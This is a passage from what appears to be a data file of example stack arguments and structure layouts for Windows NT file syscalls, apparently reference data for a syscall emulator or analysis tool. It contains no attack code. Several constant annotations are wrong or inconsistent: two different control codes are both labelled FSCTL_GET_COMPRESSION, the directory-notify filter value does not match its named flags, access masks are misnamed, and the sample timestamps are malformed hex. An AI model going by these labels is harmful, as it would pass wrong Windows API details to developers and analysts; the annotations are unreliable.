ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct152\",\r\n \"structureValueExpectations\": \"Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0012019F\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"PHANDLE NamedPipeFileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct150\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xFFFFFFFFFFFFFFFF\",\r\n \"fieldComment\": \"Infinite timeout\"\r\n }\r\n ]\r\n },\r\n \"struct151\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n }\r\n ]\r\n },\r\n \"struct152\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0120\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeleteFile\": {\r\n \"ntFunc\": \"NtDeleteFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct153\",\r\n \"structureValueExpectations\": \"Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct153\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0130\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeviceIoControlFile\": {\r\n \"ntFunc\": \"NtDeviceIoControlFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG OutputBufferLength (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"PVOID OutputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00e0\"\r\n },\r\n {\r\n \"value\": \"0x00000800\",\r\n \"additionalComment\": \"ULONG InputBufferLength (2048 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"PVOID InputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00f0\"\r\n },\r\n {\r\n \"value\": \"0x0022200B\",\r\n \"additionalComment\": \"ULONG IoControlCode (IOCTL code example: FSCTL_GET_COMPRESSION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct154\",\r\n \"structureValueExpectations\": \"Status and information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000044\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct154\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFlushBuffersFile\": {\r\n \"ntFunc\": \"NtFlushBuffersFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct155\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct155\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional info\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFsControlFile\": {\r\n \"ntFunc\": \"NtFsControlFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG OutputBufferLength (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OutputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1010\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG InputBufferLength (32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to InputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1020\"\r\n },\r\n {\r\n \"value\": \"0x00090018\",\r\n \"additionalComment\": \"ULONG FsControlCode (FSCTL_GET_COMPRESSION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct156\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ApcContext (dummy pointer, usually None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct156\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0xC0000023\",\r\n \"fieldComment\": \"STATUS_BUFFER_TOO_SMALL\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"16 bytes transferred\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtLockFile\": {\r\n \"ntFunc\": \"NtLockFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN ExclusiveLock (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN FailImmediately (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000000AA\",\r\n \"additionalComment\": \"ULONG Key (arbitrary key value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Length (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct157\",\r\n \"structureValueExpectations\": \"Length of the region to lock.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ByteOffset (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct158\",\r\n \"structureValueExpectations\": \"Starting byte offset for the lock.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct159\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct157\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000001000\",\r\n \"fieldComment\": \"Length: 4096 bytes\"\r\n }\r\n ]\r\n },\r\n \"struct158\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Offset: start of file\"\r\n }\r\n ]\r\n },\r\n \"struct159\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional info\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtNotifyChangeDirectoryFile\": {\r\n \"ntFunc\": \"NtNotifyChangeDirectoryFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WatchTree (TRUE, watch subdirectories)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000010A\",\r\n \"additionalComment\": \"ULONG CompletionFilter (FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_DIR_NAME)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG BufferSize (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1080\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct160\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct160\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000103\",\r\n \"fieldComment\": \"STATUS_PENDING\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional info\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenFile\": {\r\n \"ntFunc\": \"NtOpenFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG OpenOptions (FILE_NON_DIRECTORY_FILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000007\",\r\n \"additionalComment\": \"ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct161\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct162\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | SYNCHRONIZE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to HANDLE FileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct161\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional info\"\r\n }\r\n ]\r\n },\r\n \"struct162\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryAttributesFile\": {\r\n \"ntFunc\": \"NtQueryAttributesFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to FILE_BASIC_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": \"FILE_BASIC_INFORMATION\",\r\n \"structureRef\": \"struct163\",\r\n \"structureValueExpectations\": \"Basic file attributes such as creation time, last access time, etc.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct164\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct163\": {\r\n \"type\": \"FILE_BASIC_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"CreationTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B0000\",\r\n \"fieldComment\": \"Sample file creation time\"\r\n },\r\n {\r\n \"fieldName\": \"LastAccessTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B1000\",\r\n \"fieldComment\": \"Sample last access time\"\r\n },\r\n {\r\n \"fieldName\": \"LastWriteTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B2000\",\r\n \"fieldComment\": \"Sample last write time\"\r\n },\r\n {\r\n \"fieldName\": \"ChangeTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B3000\",\r\n \"fieldComment\": \"Sample change time\"\r\n },\r\n {\r\n \"fieldName\": \"FileAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"FILE_ATTRIBUTE_ARCHIVE\"\r\n }\r\n ]\r\n },\r\n \"struct164\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryDirectoryFile\": {\r\n \"ntFunc\": \"NtQueryDirectoryFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN RestartScan (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING FileName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct165\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the file name to query for.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN ReturnSingleEntry (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"FILE_INFORMATION_CLASS FileInformationClass (FileDirectoryInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to buffer for FileInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct166\",\r\n \"structureValueExpectations\": \"Status and information fields for the I/O operation.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n 